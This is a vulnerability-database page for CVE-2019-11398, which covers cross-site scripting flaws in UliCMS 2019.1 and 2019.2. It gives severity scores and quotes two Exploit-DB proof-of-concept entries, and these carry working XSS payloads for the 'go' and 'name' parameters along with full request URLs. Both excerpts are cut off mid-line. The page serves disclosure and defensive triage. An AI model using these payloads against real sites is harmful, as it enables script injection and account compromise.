CVE-2019-11398
published 2019-05-08CVE-2019-11398: Multiple cross-site scripting (XSS) vulnerabilities in UliCMS 2019.2 and 2019.1 allow remote attackers to inject arbitrary web script or HTML via the go…
PriorityP433medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
3.47%
87.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in UliCMS 2019.2 and 2019.1 allow remote attackers to inject arbitrary web script or HTML via the go parameter to admin/index.php, the go parameter to /admin/index.php?register=register, or the error parameter to admin/index.php?action=favicon.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ulicms | ulicms | — | — |
| ulicms | ulicms | — | — |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
exploitdb·2019-06-10·CVSS 6.1
CVE-2019-11398 [MEDIUM] UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
---
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398
# Description
# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.
# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name=">alert('UNK9VVN')
# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&p
Exploit-DB
UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting
exploitdb·2019-04-22·CVSS 6.1
CVE-2019-11398 [MEDIUM] UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting
UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting
---
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398
### Vulnerability 1
Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Result :
### Vulnerability 2
Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GE
No writeups or analysis indexed.
2019-05-08
Published